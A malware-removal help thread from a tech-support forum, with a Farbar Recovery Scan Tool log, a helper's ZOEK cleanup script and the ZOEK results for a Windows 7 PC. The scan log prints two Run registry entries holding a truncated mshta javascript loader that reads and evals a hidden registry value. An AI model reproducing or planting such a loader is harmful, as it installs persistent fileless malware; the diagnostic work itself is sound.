Help removing malware

Hi there

I was hoping for some help in removing malware. Avast has been pinging like mad since this morning. Avast doesn’t seem to remove it even when i run a system scan.

Have run a Farbar Recovery Scan Tool test as recommended elsewhere on the forum. I’ve pasted the results below in the hope that someone might be able to help with eradicating the problem. Thanks in advance for any suggestions :slight_smile:

FRST.txt

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 21-06-2015 01
Ran by home (administrator) on HOME-PC on 22-06-2015 11:49:14
Running from C:\Users\home\Desktop
Loaded Profiles: home (Available Profiles: home & Remote)
Platform: Microsoft Windows 7 Professional Service Pack 1 (X86) OS Language: English (United States)
Internet Explorer Version 11 (Default browser: IE)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
() C:\Program Files\Web Connection\Y855_EE\BackgroundService\ServiceManager.exe
(LogMeIn, Inc.) C:\Program Files\LogMeIn\x86\LMIGuardianSvc.exe
(DEVGURU Co., LTD.) C:\Program Files\SAMSUNG\USB Drivers\25_escape\conn\ss_conn_service.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Adobe Systems Incorporated) C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe
(LogMeIn, Inc.) C:\Program Files\LogMeIn\x86\LogMeInSystray.exe
(Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(Oracle Corporation) C:\Program Files\Common Files\Java\Java Update\jusched.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\avastui.exe
() C:\Program Files\VTech\DownloadManager\System\AgentMonitor.exe
(FTR Pty. Ltd.) C:\Program Files\FTR\ForTheRecord\FTRSearchFolders.exe
() C:\Program Files\Web Connection\Y855_EE\BackgroundService\ModemListener.exe
(Microsoft Corporation) C:\Windows\WindowsMobile\wmdcBase.exe
(TomTom) C:\Program Files\MyDrive Connect\TomTom MyDrive Connect.exe
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner.exe
(NCH Software) C:\Program Files\NCH Software\Scribe\scribe.exe
(Microsoft Corporation) C:\Windows\System32\wbem\unsecapp.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE
(Microsoft Corporation) C:\Program Files\Microsoft Office\OFFICE11\EXCEL.EXE
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Adobe Systems Incorporated) C:\Windows\System32\Macromed\Flash\FlashUtil32_14_0_0_125_ActiveX.exe
(Microsoft Corporation) C:\Windows\System32\wuauclt.exe
(FileZilla Project) C:\Users\home\Downloads\FileZilla_3.7.1_win32\FileZilla-3.7.1\filezilla.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe

==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM.…\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [946352 2012-12-03] (Adobe Systems Incorporated)
HKLM.…\Run: [LogMeIn GUI] => C:\Program Files\LogMeIn\x86\LogMeInSystray.exe [63048 2013-04-30] (LogMeIn, Inc.)
HKLM.…\Run: [SunJavaUpdateSched] => C:\Program Files\Common Files\Java\Java Update\jusched.exe [254336 2013-07-02] (Oracle Corporation)
HKLM.…\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvastUI.exe [5227648 2015-03-30] (AVAST Software)
HKLM.…\Run: [AgentMonitor] => C:\Program Files\VTech\DownloadManager\System\AgentMonitor.exe [391040 2014-04-17] ()
HKLM.…\Run: [FTR Search Folders] => C:\Program Files\FTR\ForTheRecord\FTRSearchFolders.exe [94208 2012-12-06] (FTR Pty. Ltd.)
HKLM.…\Run: [MSRS] => C:\Program Files\NCH Software\MSRS\msrs.exe [1067524 2014-12-11] (NCH Software)
HKLM.…\Run: [EE MORPHO ModemListener] => C:\Program Files\Web Connection\Y855_EE\BackgroundService\ModemListener.exe [159056 2014-05-16] ()
HKLM.…\Run: [Windows Mobile-based device management] => C:\Windows\WindowsMobile\wmdcBase.exe [648072 2007-05-31] (Microsoft Corporation)
HKLM.…\Run: [**ae5247d6<>] => mshta javascript:qF3FqNEcm=“zX6biHBz2U”;P3Y=new%20ActiveXObject(“WScript.Shell”);AD9hXrw=“1EafLBrD”;cvk4J6=P3Y.RegRead(“HKLM\software\ae8c3fee\6fecae9c”);m1t9pCUD=“71P5TNR”;eval(cvk4J6);C2BueEz3="6 (the data entry has 7 more characters). <===== ATTENTION (Value Name with invalid characters)
HKLM.…\Policies\Explorer\Run: [] =>
HKU\S-1-5-21-1304999761-2293218496-246315724-1000.…\Run: [MyDriveConnect.exe] => C:\Program Files\MyDrive Connect\TomTom MyDrive Connect.exe [1905032 2015-04-28] (TomTom)
HKU\S-1-5-21-1304999761-2293218496-246315724-1000.…\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner.exe [5503768 2015-02-19] (Piriform Ltd)
HKU\S-1-5-21-1304999761-2293218496-246315724-1000.…\MountPoints2: {48b0afcb-e586-11e3-9bdf-001e4fd3631b} - F:\InnoTabSetup.exe
HKU\S-1-5-21-1304999761-2293218496-246315724-1000.…\MountPoints2: {eae30f1f-a85c-11e4-b8fc-001e4fd3631b} - F:\autorun.exe
HKU\S-1-5-18.…\Run: [**ae5247d6<
>] => mshta javascript:x6kvoQz4=“rLhTIzQy”;v2N=new%20ActiveXObject(“WScript.Shell”);FFfUbEV5=“VuLd”;u4z7kO=v2N.RegRead(“HKCU\software\ae8c3fee\6fecae9c”);hgRf2bBNH=“s7Vqtqu05i”;eval(u4z7kO);YB7XtxSd="CxK (the data entry has 2 more characters). <===== ATTENTION (Value Name with invalid characters)
HKLM.…\AppCertDlls: [x64] → c:\program files\settings manager\smdmf\x64\sysapcrt.dll
ShellIconOverlayIdentifiers: [00avast] → {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2014-12-31] (AVAST Software)
CHR HKU\S-1-5-21-1304999761-2293218496-246315724-1000\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKU\S-1-5-21-1304999761-2293218496-246315724-1000\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.co.uk/
HKU\S-1-5-21-1304999761-2293218496-246315724-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://uk.msn.com/?ocid=iehp
SearchScopes: HKLM → {9BB47C17-9C68-4BB3-B188-DD9AF0FD2492} URL = http://www.default-search.net/search?sid=492&aid=345&itype=a&ver=15005&tm=577&src=ds&p={searchTerms}
SearchScopes: HKU\S-1-5-21-1304999761-2293218496-246315724-1000 → {9BB47C17-9C68-4BB3-B188-DD9AF0FD2492} URL = http://www.default-search.net/search?sid=492&aid=345&itype=a&ver=15005&tm=577&src=ds&p={searchTerms}
BHO: Adobe PDF Link Helper → {18DF081C-E8AD-4283-A596-FA578C2EBDC3} → C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2012-12-18] (Adobe Systems Incorporated)
BHO: Java™ Plug-In SSV Helper → {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} → C:\Program Files\Java\jre7\bin\ssv.dll [2013-10-08] (Oracle Corporation)
BHO: avast! Online Security → {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} → C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll [2014-12-31] (AVAST Software)
BHO: Java™ Plug-In 2 SSV Helper → {DBC80044-A445-435b-BC74-9C25C1C588A9} → C:\Program Files\Java\jre7\bin\jp2ssv.dll [2013-10-08] (Oracle Corporation)
Toolbar: HKU\S-1-5-21-1304999761-2293218496-246315724-1000 → No Name - {D4027C7F-154A-4066-A1AD-4243D8127440} - No File
DPF: {1ABA5FAC-1417-422B-BA82-45C35E2C908B} http://kitchenplanner.ikea.com/JP/Core/Player/2020PlayerAX_IKEA_Win32.cab
DPF: {8A5BE387-D09A-4DFA-A56B-DCB89BD11468} https://spaces.diy.com/2020Spaces_main/UI/idealSpaces/AE/AppEngine/RoomEngine/Core/Player/2020PlayerAX_WEB_Win32.cab
Tcpip\Parameters: [DhcpNameServer] 192.168.1.254

FireFox:

FF ProfilePath: C:\Users\home\AppData\Roaming\Mozilla\Firefox\Profiles\jfl11v1b.default
FF NewTab: about:newtab
FF DefaultSearchEngine: Google (avast)
FF DefaultSearchUrl: https://www.google.com/search/?trackid=sp-006
FF SearchEngineOrder.1: Google (avast)
FF SelectedSearchEngine: Google (avast)
FF Homepage: https://www.google.com/?trackid=sp-006
FF Keyword.URL: https://www.google.com/search/?trackid=sp-006
FF Plugin: @adobe.com/FlashPlayer → C:\Windows\system32\Macromed\Flash\NPSWF32_11_4_402_265.dll [2012-09-01] ()
FF Plugin: @java.com/DTPlugin,version=10.45.2 → C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll [2013-10-08] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=10.45.2 → C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll [2013-10-08] (Oracle Corporation)
FF Plugin: @microsoft.com/GENUINE → disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 → c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll [2014-05-13] ( Microsoft Corporation)
FF Plugin: @tools.google.com/Google Update;version=3 → C:\Program Files\Google\Update\1.3.27.5\npGoogleUpdate3.dll [2015-05-19] (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 → C:\Program Files\Google\Update\1.3.27.5\npGoogleUpdate3.dll [2015-05-19] (Google Inc.)
FF Plugin: Adobe Reader → C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll [2013-02-15] (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nppdf32.dll [2013-02-15] (Adobe Systems Inc.)
FF SearchPlugin: C:\Users\home\AppData\Roaming\Mozilla\Firefox\Profiles\jfl11v1b.default\searchplugins\askcom.xml [2013-03-04]
FF SearchPlugin: C:\Users\home\AppData\Roaming\Mozilla\Firefox\Profiles\jfl11v1b.default\searchplugins\default-search.xml [2014-12-30]
FF SearchPlugin: C:\Users\home\AppData\Roaming\Mozilla\Firefox\Profiles\jfl11v1b.default\searchplugins\google-avast.xml [2015-02-22]
FF SearchPlugin: C:\Program Files\mozilla firefox\searchplugins\default-search.xml [2014-12-30]
FF HKLM.…\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\AVAST Software\Avast\WebRep\FF
FF Extension: Avast Online Security - C:\Program Files\AVAST Software\Avast\WebRep\FF [2013-12-06]

Chrome:

CHR Plugin: (Shockwave Flash) - C:\Program Files\Google\Chrome\Application\40.0.2214.115\PepperFlash\pepflashplayer.dll No File
CHR Plugin: (Shockwave Flash) - C:\Windows\system32\Macromed\Flash\NPSWF32_11_4_402_265.dll ()
CHR Plugin: (Chrome Remote Desktop Viewer) - internal-remoting-viewer
CHR Plugin: (Native Client) - C:\Program Files\Google\Chrome\Application\40.0.2214.115\ppGoogleNaClPluginChrome.dll No File
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files\Google\Chrome\Application\40.0.2214.115\pdf.dll No File
CHR Plugin: (Adobe Acrobat) - C:\Program Files\Adobe\Reader 10.0\Reader\Browser\nppdf32.dll (Adobe Systems Inc.)
CHR Plugin: (Google Update) - C:\Program Files\Google\Update\1.3.21.123\npGoogleUpdate3.dll No File
CHR Plugin: (Java™ Platform SE 7 U9) - C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
CHR Plugin: (Java Deployment Toolkit 7.0.70.10) - C:\Windows\system32\npDeployJava1.dll No File
CHR Profile: C:\Users\home\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\home\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-11-27]
CHR Extension: (Google Cast) - C:\Users\home\AppData\Local\Google\Chrome\User Data\Default\Extensions\boadgeojelhgndaghljhdicfkmllpafd [2014-11-27]
CHR Extension: (Avast Online Security) - C:\Users\home\AppData\Local\Google\Chrome\User Data\Default\Extensions\gomekmidlodglbbmalcneegieacbdmki [2014-09-08]
CHR Extension: (Google Wallet) - C:\Users\home\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-10-10]
CHR HKLM.…\Chrome\Extension: [fgbcffenncokfocljomejddmgcpppjom] - https://clients2.google.com/service/update2/crx
CHR HKLM.…\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx [2014-12-31]

========================== Services (Whitelisted) =================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [50344 2014-12-31] (AVAST Software)
R2 EE MORPHO Modem Device Helper; C:\Program Files\Web Connection\Y855_EE\BackgroundService\ServiceManager.exe [58192 2013-06-18] ()
S2 MSRSService; C:\Program Files\NCH Software\MSRS\msrs.exe [1067524 2014-12-11] (NCH Software) [File not signed]
R2 ss_conn_service; C:\Program Files\Samsung\USB Drivers\25_escape\conn\ss_conn_service.exe [743688 2014-10-13] (DEVGURU Co., LTD.)
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [680960 2009-07-14] (Microsoft Corporation)

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 aswHwid; C:\Windows\system32\drivers\aswHwid.sys [24184 2014-12-31] ()
R2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [70384 2014-12-31] (AVAST Software)
R1 aswRdr; C:\Windows\system32\drivers\aswRdr2.sys [81768 2014-12-31] (AVAST Software)
R0 aswRvrt; C:\Windows\system32\Drivers\aswRvrt.sys [49944 2014-12-31] ()
R1 aswSnx; C:\Windows\system32\drivers\aswSnx.sys [787800 2014-12-31] (AVAST Software)
R1 aswSP; C:\Windows\system32\drivers\aswSP.sys [423784 2014-12-31] (AVAST Software)
R2 aswStm; C:\Windows\system32\drivers\aswStm.sys [91496 2014-12-31] (AVAST Software)
R0 aswVmm; C:\Windows\system32\Drivers\aswVmm.sys [206248 2014-12-31] ()
R2 DgiVecp; C:\Windows\system32\Drivers\DgiVecp.sys [38400 2009-06-09] (Samsung Electronics Co., Ltd.) [File not signed]
S4 DNE; C:\Windows\System32\DRIVERS\dne2000.sys [131984 2008-11-16] (Deterministic Networks, Inc.)
R3 e1express; C:\Windows\System32\DRIVERS\e1e6232.sys [219352 2009-06-05] (Intel Corporation)
R2 SSPORT; C:\Windows\system32\Drivers\SSPORT.sys [5120 2008-01-10] (Samsung Electronics) [File not signed]
S4 LMIRfsClientNP; No ImagePath
S3 SWVNIC; system32\DRIVERS\swvnic.sys

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2015-06-22 11:28 - 2015-06-22 11:29 - 00034577 _____ C:\Users\home\Desktop\Addition.txt
2015-06-22 11:27 - 2015-06-22 11:49 - 00014309 _____ C:\Users\home\Desktop\FRST.txt
2015-06-22 11:27 - 2015-06-22 11:49 - 00000000 ____D C:\FRST
2015-06-22 11:26 - 2015-06-22 11:26 - 01148928 _____ (Farbar) C:\Users\home\Desktop\FRST.exe
2015-06-19 08:55 - 2015-06-19 08:55 - 00000396 _____ C:\Windows\PFRO.log
2015-05-31 17:06 - 2015-05-31 17:06 - 00000000 ____D C:\Users\home\Desktop\Enforcement of right of way

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2015-06-22 11:43 - 2013-06-25 17:39 - 00000000 ____D C:\Users\home\Documents*** work
2015-06-22 11:11 - 2012-11-06 11:42 - 00000886 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2015-06-22 11:03 - 2009-07-14 05:34 - 00020720 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2015-06-22 11:03 - 2009-07-14 05:34 - 00020720 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2015-06-22 11:00 - 2012-09-09 23:34 - 00000000 ____D C:\Users\home\AppData\Roaming\FileZilla
2015-06-22 10:59 - 2012-08-20 20:43 - 01277635 _____ C:\Windows\WindowsUpdate.log
2015-06-22 10:56 - 2015-03-09 10:21 - 00019408 _____ C:\Windows\setupact.log
2015-06-22 10:56 - 2012-11-06 11:42 - 00000882 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2015-06-22 10:56 - 2009-07-14 05:53 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2015-06-20 18:23 - 2015-03-16 10:50 - 00000000 ____D C:\Users\home\Documents*l
2015-06-20 16:28 - 2012-09-09 23:07 - 00000000 ____D C:\Users\home\Documents\My docs
2015-06-20 14:04 - 2013-05-03 16:54 - 00000000 ____D C:\Users\home\Documents\Scanned docs
2015-06-19 12:32 - 2015-04-23 12:10 - 00000000 ____D C:\Users\home\Documents*
LLP
2015-06-06 17:31 - 2009-07-14 05:52 - 00000000 ____D C:\Windows\system32\FxsTmp
2015-06-05 17:33 - 2012-10-24 16:20 - 00000000 ____D C:\Users\home\Documents***
2015-06-05 12:48 - 2015-03-16 11:56 - 00000000 ____D C:\Users\home\Documents***
2015-05-27 16:59 - 2012-08-20 20:48 - 00726316 _____ C:\Windows\system32\PerfStringBackup.INI

==================== Files in the root of some directories =======

2012-08-20 21:01 - 2012-08-20 21:01 - 0000040 _____ () C:\Users\home\AppData\Roaming\burnaware.ini
2014-05-27 11:09 - 2014-05-27 11:11 - 0000581 _____ () C:\Users\home\AppData\Local\cookies.ini
2013-05-03 16:44 - 2013-05-03 16:44 - 0000057 _____ () C:\ProgramData\Ament.ini
2012-08-20 21:47 - 2012-08-20 21:47 - 0001534 _____ () C:\ProgramData\ss.ini

Files to move or delete:

C:\Users\home\CTX.DAT

Some files in TEMP:

C:\Users\Remote\AppData\Local\Temp\AskSLib.dll

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2015-06-15 08:26

==================== End of log ============================

Hello,

Please attach reports. Thanks.

Hi TwinheadedEngle

Apologies for being thick, but how do I do that?

Sorry for being dim. I’ve figured out how to attach!

https://sites.google.com/site/cannedfixes/home/hosted-images-tools/51a612a8b27e2-Zoek.png
Scan with ZOEK

Please download ZOEK by Smeenk and save it to your desktop (preferred version is the *.exe one)
Temporary disable your AntiVirus and AntiSpyware protection - instructions here.

[*]Right-click on
https://sites.google.com/site/cannedfixes/home/hosted-images-tools/51a612a8b27e2-Zoek.png
icon and select
https://sites.google.com/site/cannedfixes/home/hosted-images-tools/RunAsAdmin.jpg
Run as Administrator to start the tool.
[]Wait patiently until the main console will appear, it may take a minute or two.
[
]In the main box please paste in the following script:

createsrpoint;
autoclean;
emptyalltemp;
ipconfig /flushdns;b

[*]Make sure that Scan All Users option is checked.
[*]Push Run Script and wait patiently. The scan may take a couple of minutes.
[*]When the scan completes, a zoek-results logfile should open in notepad.
[*]If a reboot is needed, it will be opened after it. You may also find it at your main drive (usually C:\ drive)

Post its content into your next reply.

Hi TwinHeadedEagle, I’ve run ZOEK as you have outlined and the results are attached. During the course of ZOEK doing its business, Windows threw up a couple of error messages which I’ve also attached for good measure. Your help is much appreciated :slight_smile:

Did zoek finish?

Yes, it finished and, as you anticipated, needed to reboot before finalising.

Do you have report?

It should’ve been attached, but I’ve pasted it below in case it didn’t come up:

Zoek.exe v5.0.0.0 Updated 04-May-2015
Tool run by home on 22/06/2015 at 13:00:41.81.
Microsoft Windows 7 Professional 6.1.7601 Service Pack 1 x86
Running in: Normal Mode Internet Access Detected
Launched: C:\Users\home\Desktop\zoek.exe [Scan all users] [Script inserted]

==== System Restore Info ======================

22/06/2015 13:05:35 Zoek.exe System Restore Point Created Successfully.

==== Empty Folders Check ======================

C:\Program Files\Citrix deleted successfully
C:\Program Files\VideoLAN deleted successfully
C:\Program Files\Common Files\Soda PDF 5 deleted successfully
C:\PROGRA~2\Oracle deleted successfully
C:\PROGRA~2\PlotSoft deleted successfully
C:\Users\home\AppData\Roaming\Recordpad deleted successfully
C:\Users\home\AppData\Local\LogMeIn Rescue Applet deleted successfully
C:\Users\Remote\AppData\Local\VirtualStore deleted successfully

==== Deleting CLSID Registry Keys ======================

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\SearchScopes{9BB47C17-9C68-4BB3-B188-DD9AF0FD2492} deleted successfully

==== Deleting CLSID Registry Values ======================

==== Deleting Services ======================

==== FireFox Fix ======================

ProfilePath: C:\Users\home\AppData\Roaming\Mozilla\Firefox\Profiles\jfl11v1b.default

user.js not found
---- Lines ask.com modified from prefs.js ----

user_pref(“extensions.enabledAddons”, "wtxpcom@mybrowserbar.com:6.9,freerip@mybrowserbar.com:6.9,toolbar@ask.com:3.15.4.100015,{972ce4c6-7e08-4474-a28
---- Lines mybrowserbar modified from prefs.js ----

user_pref(“extensions.enabledAddons”, "wtxpcom@mybrowserbar.com:6.9,freerip@mybrowserbar.com:6.9,toolbar@disabled:3.15.4.100015,{972ce4c6-7e08-4474-a2
---- FireFox user.js and prefs.js backups ----

prefs_062015_1321_.backup

==== Batch Command(s) Run By Tool======================

==== Deleting Files \ Folders ======================

C:\Program Files\Citrix not found
C:\Program Files\VideoLAN not found
C:\Program Files\Design&Print deleted
C:\Program Files\Mozilla Firefox\searchplugins\default-search.xml deleted
C:\Program Files\NCH Software\Components\NCHToolbars deleted
C:\Program Files\FreeRIP deleted
C:\Program Files\Common Files\Spigot deleted
C:\Users\home\AppData\Roaming\FirefoxToolbar deleted
C:\Users\home\AppData\Roaming\burnaware.ini deleted
C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Browse and Search the Internet.lnk deleted
C:\PROGRA~2\FreeRIP deleted
C:\Users\home\AppData\Local\Linkey deleted
C:\Users\home\AppData\Local\cache deleted
C:\Users\home\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\FreeRIP deleted
C:\Users\home\Downloads\iLividSetup.exe deleted
C:\Users\home\Downloads\2965624 038078 2012 Mr Leo Ogoegbunam Oraegbu CCCSH Committee Bundle 20140710.doc deleted
C:\Users\home\AppData\LocalLow\DataMngr deleted
C:\Users\Remote\AppData\LocalLow\AskToolbar deleted
C:\Users\Remote\AppData\LocalLow\Search Settings deleted
C:\Windows\system32\config\systemprofile\AppData\LocalLow\Application Updater deleted
C:\Users\home\AppData\Roaming\Mozilla\Firefox\Profiles\jfl11v1b.default\searchplugins\askcom.xml deleted
C:\Users\home\AppData\Roaming\Mozilla\Firefox\Profiles\jfl11v1b.default\searchplugins\default-search.xml deleted

==== Firefox Start and Search pages ======================

ProfilePath: C:\Users\home\AppData\Roaming\Mozilla\Firefox\Profiles\jfl11v1b.default
user_pref(“browser.startup.homepage”, “https://www.google.com/?trackid=sp-006”);
user_pref(“browser.search.defaulturl”, “https://www.google.com/search/?trackid=sp-006”);
user_pref(“browser.newtab.url”, “about:newtab”);
user_pref(“browser.search.defaultengine”, “Google (avast)”);
user_pref(“browser.search.defaultenginename”, “Google (avast)”);
user_pref(“browser.search.selectedEngine”, “Google (avast)”);
user_pref(“keyword.URL”, “https://www.google.com/search/?trackid=sp-006”);

==== Firefox Extensions Registry ======================

[HKEY_LOCAL_MACHINE\Software\Mozilla\Firefox\Extensions]
wrc@avast.com”=“C:\Program Files\AVAST Software\Avast\WebRep\FF” [28/01/2015 10:11]

==== Firefox Extensions ======================

AppDir: C:\Program Files\Mozilla Firefox

  • Default - %AppDir%\extensions{972ce4c6-7e08-4474-a285-3208198ce6fd}

==== Firefox Plugins ======================

Profilepath: C:\Users\home\AppData\Roaming\Mozilla\Firefox\Profiles\jfl11v1b.default
6768C724599214E4F9ADD9F8FF5097EB - C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll - Java™ Platform SE 7 U45
F647D0BEA553C1D0C251CE07DA6A5511 - C:\Program Files\Mozilla Firefox\plugins\nppdf32.dll - Adobe Acrobat
2ED65CF5725FCD0DFD40F87782AE37D5 - C:\Windows\system32\Macromed\Flash\NPSWF32_11_4_402_265.dll - Shockwave Flash
F647D0BEA553C1D0C251CE07DA6A5511 - C:\Program Files\Adobe\Reader 10.0\Reader\browser\nppdf32.dll - Adobe Acrobat
DB988B4550DB9BCE86F9199D961057FC - C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll - Adobe Acrobat
15E298B5EC5B89C5994A59863969D9FF - C:\Windows\system32\npmproxy.dll - Microsoft® Windows® Operating System

==== Chromium Look ======================

Google Chrome Version: 43.0.2357.124

HKEY_LOCAL_MACHINE\SOFTWARE\Google\Chrome\Extensions
fgbcffenncokfocljomejddmgcpppjom - No path found
gomekmidlodglbbmalcneegieacbdmki - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx[31/12/2014 21:20]

Google Voice Search Hotword (Beta) - home\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn
Google Cast - home\AppData\Local\Google\Chrome\User Data\Default\Extensions\boadgeojelhgndaghljhdicfkmllpafd
Avast Online Security - home\AppData\Local\Google\Chrome\User Data\Default\Extensions\gomekmidlodglbbmalcneegieacbdmki
Ask Toolbar - home\AppData\Local\Torch\User Data\Default\Extensions\aaaalejpmnocmhmlbmlkjemekckoagne
Docs - home\AppData\Local\Torch\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake
DropToS - home\AppData\Local\Torch\User Data\Default\Extensions\cipmepknanmbbaneimacddfemfbfgpgo
Torch Music - home\AppData\Local\Torch\User Data\Default\Extensions\gcjbdjlojcomlphfchhihkigepfabcad
Domain Error Assistant - home\AppData\Local\Torch\User Data\Default\Extensions\icdlfehblmklkikfigmjhbmmpmkmpooj
Torch Helper - home\AppData\Local\Torch\User Data\Default\Extensions\lecpjhggilhbceadobnggaagnpfpafhg
Slick Savings - home\AppData\Local\Torch\User Data\Default\Extensions\mhkaekfpcppmmioggniknbnbdbcigpkk
Torch Music - home\AppData\Local\Torch\User Data\Default\Extensions\ohimbkoaphfnmekmfppijeblmkncneed
Hola - home\AppData\Local\Torch\User Data\Default\Extensions\pdehmppfilefbolgganhfihpbmjlgebh

==== Chromium Startpages ======================

C:\Users\home\AppData\Local\Torch\User Data\Default\Preferences
“homepage”: “http://home.torchbrowser.com/?systemid=410&appid=20&ua=Torch&clid={8DFCA28C-B3AA-4663-8AC5-48C83E9C13F8}”,
“urls_to_restore_on_startup”: [ “http://home.torchbrowser.com/?systemid=410&appid=20&ua=Torch&clid={8DFCA28C-B3AA-4663-8AC5-48C83E9C13F8}” ]

==== Chromium Fix ======================

C:\Users\home\AppData\Local\Torch\User Data\Default\Extensions\icdlfehblmklkikfigmjhbmmpmkmpooj deleted successfully
C:\Users\home\AppData\Local\Torch\User Data\Default\Extensions\aaaalejpmnocmhmlbmlkjemekckoagne deleted successfully
C:\Users\home\AppData\Local\Torch\User Data\Default\Extensions\mhkaekfpcppmmioggniknbnbdbcigpkk deleted successfully
C:\Users\home\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mhkaekfpcppmmioggniknbnbdbcigpkk deleted successfully

==== Set IE to Default ======================

Old Values:
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
“Start Page”=“http://www.google.co.uk/

New Values:
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
“Start Page”=“http://www.google.co.uk/

==== All HKCU SearchScopes ======================

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes
“DefaultScope”=“{0633EE93-D776-472f-A0FF-E1416B8B2E3A}”
{012E1000-F331-11DB-8314-0800200C9A66} Google Url=“http://www.google.com/search?q={searchTerms}
{0633EE93-D776-472f-A0FF-E1416B8B2E3A} Bing Url=“http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IE11SR
{9BB47C17-9C68-4BB3-B188-DD9AF0FD2492} default-search.net Url=“http://www.default-search.net/search?sid=492&aid=345&itype=a&ver=15005&tm=577&src=ds&p={searchTerms}

==== Deleting Registry Keys ======================

HKEY_CURRENT_USER\Software\Policies\Google deleted successfully
HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SearchSettings deleted successfully
